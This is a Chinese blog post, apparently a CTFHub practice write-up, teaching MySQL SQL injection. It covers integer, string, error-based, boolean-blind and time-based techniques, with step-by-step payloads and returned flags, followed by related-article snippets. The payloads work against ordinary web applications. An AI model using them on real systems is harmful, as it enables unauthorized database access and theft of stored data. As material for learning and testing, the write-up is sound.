sql注入入门

最新推荐文章于 2022-03-27 20:29:16 发布
最新推荐文章于 2022-03-27 20:29:16 发布
阅读量168 收藏
点赞数 1
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51911432/article/details/110888245
版权

目录

一、整数型注入

1.判断是否存在注入:
加单引号id=1’
对应的sql:select * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常;
加and 1=1
id=1 and 1=1
id=3’ and 1=1 语句执行正常,与原始页面如任何差异;
加and 1=2id=1 and 1=2
对应的sql:select * from table where id=3 and 1=2 语句可以正常执行,但是无法查询出结果,所以返回数据与原始网页存在差异
如果满足以上三点,则可以判断该URL存在数字型注入。
1.获取数据库

select * from news where id=-1 union select 1,database()

ID: 1
Data: sqli
2.获取数据库中的表

select * from news where id=-1 union select 1,group_concat(table_name)from information_schema.tables

ID: 1
Data: information_schema,mysql,performance_schema,sqli
3.根据 information_schema.tables 和 已知的数据库名sqli爆表名

select * from news where id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema="sqli"

ID: 1
Data: news,flag
4.找flag下的表

select * from news where id=-1 union select 1,group_concat(column_name)from information_schema.columns where table_name="flag" and table_schema="sqli"

ID: 1
Data: flag
5.得到flag

select * from news where id=4 union select 3,group_concat(flag) from sqli.flag

二、字符型注入

1.获取数据库

select * from news where id='-1' union select 1,database()#'

ID: 1
Data: sqli
2.获取数据库中的表

select * from news where id='-1' union select 1,group_concat(table_name)from information_schema.tables#''

ID: 1
Data:太多了
3.获取表中的数据

select * from news where id='-1' union select 1,group_concat(table_name)from information_schema.tables where table_schema="sqli"#'

ID: 1
Data: news,flag
4.找flag下的表

select * from news where id='-1' union select 1,group_concat(column_name)from information_schema.columns where table_schema="sqli" and table_name="flag"#'

ID: 1
Data: flag
5.得到flag

select * from news where id='-1' union select 1,group_concat(flag)flag from flag#'

ID: 1
Data: ctfhub{dab9576ff746287365714b44}

三、报错注入

1.爆当前数据库

select * from news where id=1 union select updatexml(1,concat(0x7e,datebase(),0x7e),1)

查询错误: FUNCTION sqli.datebase does not exist
2.爆所有数据库

1 union select updatexml(1,concat(0x7e, (select(group_concat(schema_name))from information_schema.schemata),0x7e),1); #

select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(schema_name))from information_schema.schemata),0x7e),1); #

查询错误: XPATH syntax error: ‘~information_schema,performance_’
回显所有数据库的部分,发现没有回显sqli的名字,所以肯定是回显的长度受限,之前用到过,substr,left ,mid ,和right函数

3.爆右边的31个字符,发现了重叠

select * from news where id=1 union select updatexml(1,concat(0x7e,right((select(group_concat(schema_name))from information_schema.schemata),31 ),0x7e),1); #

查询错误: XPATH syntax error: ‘~a,performance_schema,mysql,sqli’
4.爆表

select * from news where id=1 union select updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema="sqli"),0x7e),1)

查询错误: XPATH syntax error: ‘news,flag
5.爆列名

select * from news where id=1 union select updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_name="flag"),0x7e),1)

查询错误: XPATH syntax error: ‘flag
6.报内容

1 union select updatexml(1,concat(0x7e,(select(group_concat(flag)) from sqli.flag),0x7e),1)

	1 union select updatexml(1,concat(0x7e,right((select(group_concat(flag)) from sqli.flag),31),0x7e),1)

ctfhub{6c9019f58a83f18be302a37a}
tfhub{6c9019f58a83f18be302a37a}’

四、布尔盲注

布尔盲注一般适用于页面没有回显字段(不支持联合查询),且web页面返回True 或者 false,构造SQL语句,利用and,or等关键字来其后的语句 true 、 false使web页面返回true或者false,从而达到注入的目的来获取信息

ascii() 函数,返回字符ascii码值
参数 : str单字符
length() 函数,返回字符串的长度
参数 : str 字符串
left() 函数,返回从左至右截取固定长度的字符串
参数str,length
str : 字符串
length:截取长度
substr()/substring() 函数 , 返回从pos位置开始到length长度的子字符串
参数,str,pos,length
str: 字符串
pos:开始位置
length: 截取长度
注入流程
求当前数据库长度
求当前数据库表的ASCII
求当前数据库中表的个数
求当前数据库中其中一个表名的长度
求当前数据库中其中一个表名的ASCII
求列名的数量
求列名的长度
求列名的ASCII
求字段的数量
求字段内容的长度
求字段内容对应的ASCII

可使用burpsuite进行暴力破解

1.数据库长度

1 and(length(database()))=4

2.猜数据库名称

1 and ascii(substr(database(),1,1))=115//第一个字母为s
1 and ascii(substr(database(),2,1))=112//

……sqli
3.数据库中表的数量
1 and (select count(table_name) from information_schema.tables where table_schema=database())=2
4.第一张表的名称

	1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100
	1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>100
	1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))>100
	……news

5.第二张表的名字

	1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>100

……flag

6.flag的字段数

	1 and (select count(column_name) from information_schema.columns where table_name='flag')=1

7.字段名称

	1 and ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1))>100

……flag

8.猜flag

	1 and ascii(substr((select *from sqli.flag where id=1),1,1))>110

……

五、时间注入

1.猜数据库长度
1 and if(length(database())=4,sleep(3),1)
2猜数据库名称
1 and if(ascii(substr(database(),1,1))=115,sleep(3),1)
1 and if(ascii(substr(database(),2,1))=113,sleep(3),1)
……sqli
3.猜数据库中表的数量
1 and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(3),1)
4.猜第一个表字符
1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=110,sleep(3),1)
1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=110,sleep(3),1)
……news
5猜第二个表字符
1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=110,sleep(3),1)
6.猜flag的表字段名
1 and if(ascii(substr((select column_name form information_schema.columns where table_name=‘flag’),1,1))=110,sleep(3),1)
……flag
7.flag
1 and if(ascii(substr((select *from sqli.flag where id=1),1,1))<110,sleep(3),1)

六、cookic注入,UA注入,refer注入

与上述数字型注入类似,即需要burp抓包对数据修改。

Pvr1sC
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一个简单的PHP新闻发布系统
sowall的专栏
05-08 3495
芽雨原创PHP新闻系统教程(第一版)第一讲:用 phpmyadmin 建立数据库首先建立一个数据库,名为 yayu 。在这个数据库下建立一个数据表,名为 news 。下面进入一个重点,那就是在表 news 下建立各个字段。 那么,什么叫字段呢?通俗点,就是一类事物的总称。比如说,所有的新闻发表时间用一个名词来代表(从偶的经验来看,用 phpmyadmin 建立字段可以用中文,但从习惯来说还是用英文
sql注入详解
m0_67392811的博客
06-12 5488
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
sql注入——显错注入
qq_33441500的博客
10-14 380
mysql注入——显错注入 一,sql注入的本质 注入攻击的本质是:把用户输入的数据当作代码执行。 注入的两个关键条件: 1,用户能控制输入。 2,原本程序要执行的代码,拼接了用户输入的数据。 sql注入就是在自带的系统数据库中查询库,表,字段,内容的过程 mysql内置自带库版本>=5 msyql库 保存账户信息,权限信息,存储过程,event,时区等信...
CTFHUB-WEB
qq_51558360的博客
01-11 4589
题目:请求方式 思路一 我们知道http请求方式中没有CTFB方式,就想到CTFHUB 使用BP抓包,将原来的数据包请求方式GET改成CTFHUB 点击Forward,放包。得到flag. 积累 HTTP协议的八种请求方式 1、OPTIONS 返回服务器针对特定资源所支持的HTTP请求方法,也可以利用向web服务器发送‘*’的请求来测试服务器的功能性 2、HEAD 向服务器索要与GET请求相一致的响应,只不过响应体将不会被返回。这一方法可以再不必传输整个响应内容的情况下,就可以获取包含在响应消息头中的元信
SQL Injection (Blind)
angry_program的博客
02-08 453
前言 SQL盲注,即SQL Injection(Blind),与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果(错误回显),而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或...
【安全狐】SQL盲注_渗透小白必看
安全狐
10-02 498
[ SQL盲注 ] 盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。 SQL盲注方式: 1.布尔盲注: 布尔很明显Ture跟Fales,也就是说它只会根据你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。 2.时间盲注: 界面返回值只有一种,true 无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数,通过查看web页面返回的时间差来判断注入的语句是否正确。 SQL盲.
sql注入入门教程(附源码分析)
03-07
主要是对sql基本原理,加部分sqlmap源码分析
web安全性测试之sql注入入门
03-30
sql注入入门适合初学者,简单易学!sql注入入门适合初学者,简单易学!sql注入入门适合初学者,简单易学!
SQL注入实战
11-20
安全大神冰河亲自制作SQL注入入门级案例,非常适合初学者研究实践SQL注入,更好的提升自身对SQL 漏洞的注入能力和对数据库安全的认识。
SQL注入漏洞全接触
03-03
用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQLInjection,即SQL注入SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面...
dvwa靶场之sql注入
m0_63314341的博客
02-19 1319
sql注入是指通过分析代码,输入字符达到查找数据库中用户信息的一种行为,会导致用户账户的暴露 接下来我们先来分析一下源代码 SELECT first_name, last_name FROM users WHERE user_id = '$id' 其中重点则是上面的这段代码,这是对于数据库的一段查找代码 当我们为$id这个变量赋值时便会带入这段代码对数据库进行查询 ...
mysql 爆表名_CTFHub-技能树-SQL注入
weixin_39968436的博客
01-31 716
整数型注入不需考虑任何过滤,由于始终只返回第一行的信息,所以使用LIMIT来查看其他行的返回。常规注入流程:爆数据库名->爆表名->爆字段名->使用union select获得想要知道的对应字段的内容。爆数据库名1 union select database(),1 limit 1,2数据库为sqli爆表名通过更改limit的值得到sqli数据库中可能藏有flag的表名1 uni...
SQL注入5-6(报错注入)
m0_59082970的博客
03-27 4193
目录 一.判断闭合方式 二.爆库名 三.爆表名 四.爆列名 五.爆字段 一.判断闭合方式 Less-5/?id=1\ 二.爆库名 Less-5/?id=1' and extractvalue(1,concat(0x7e,databse(),0x7e))--+ 三.爆表名 Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from informatio...
mysql中select column_name from Information_schema.columns where table_Name = 'test'出现多个字段的问题
热门推荐
这是一颗有毒的柚子
04-06 1万+
在mysql中,通过sql查询某个表字段时,会出现一些这个表中没有的字段 例: select column_name from Information_schema.columns  where table_Name = 'test'; 因为这个表在其它库中也存在了,所以会出现多余的字段。 解决办法: select column_name from Information_s
注入sql攻击,爆库,爆表,爆字段
zzzgd_666的博客
07-07 1241
注入sql攻击,爆库,爆表,爆字段函数注意点防范于未然, 了解它,然后避免它.用好#预编译 研究sql注入攻击的方式, 自己有空写个demo试下效果 函数 除了这个函数还有其他几个函数可以实现注入sql攻击的效果 updatexml(a,b,c) 参数a: xml文档名字 参数b: xpath表达式 参数c: 替换的值 原理就是将b替换成concat函数, concat函数里又包含sql, mysq基于函数的运算法则, 应该是先执行里面的sql, 然后将查询到的值, 执行concat函数, 得到最终的字符串
sql 注入及爆表与字段
Vi的专栏
05-22 8238
http://www.cchacker.com/main 转载请保留来源与版权信息,尊重作者劳动。 一、SQL 脚本注入攻击前奏 注入点的寻找、区分、与判断 手工寻找检测注入点 http://www.target.com/article.asp?id=1ASP 注入 http://www.target.com/article.php?id=1 PHP 注入
MYSQL updatexml报错注入
weixin_30778805的博客
08-20 337
首先了解下updatexml()函数 UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参数:new_value,String格式...
mysql -- 手工注入
Nixawk
04-22 6446
------------------[index1.php源码]------------------ ID: ------------------[index2.php源码]------------------ $con = mysql_connect("localhost","root","fuckyou"); mysql_select_db("mytestdb"
SQL注入进行爆库爆表
angry_program的博客
01-03 6222
SQL注入能做什么 正像小偷从窗户爬进入房间,他不仅能在能在房间内偷东西, 也可以将整个房子洗劫一空。 接下来看看如何利用SQL注入注入进行爆库爆表甚至报数据 ! 原理 当知道了目标网站可以进行SQL注入的时候, 如何进一步知道有哪些数据库、哪些表和字段呢? 答案是, 在mysql中有一个元数据库, 里面存储了所有整个mysql中有什么数据库, 什么表以及每个表中有哪些字段, ...
ctfshow web入门 sql注入
最新发布
03-17
SQL注入是一种常见的网络安全漏洞,它通过提交非法的SQL语句来欺骗Web应用程序,访问或修改数据库中的数据。通过在Web应用程序的输入字段中插入恶意代码,攻击者可以绕过安全措施并获得不应该拥有的敏感信息。为了防止SQL注入攻击,应该使用参数化查询并对用户输入进行严格验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值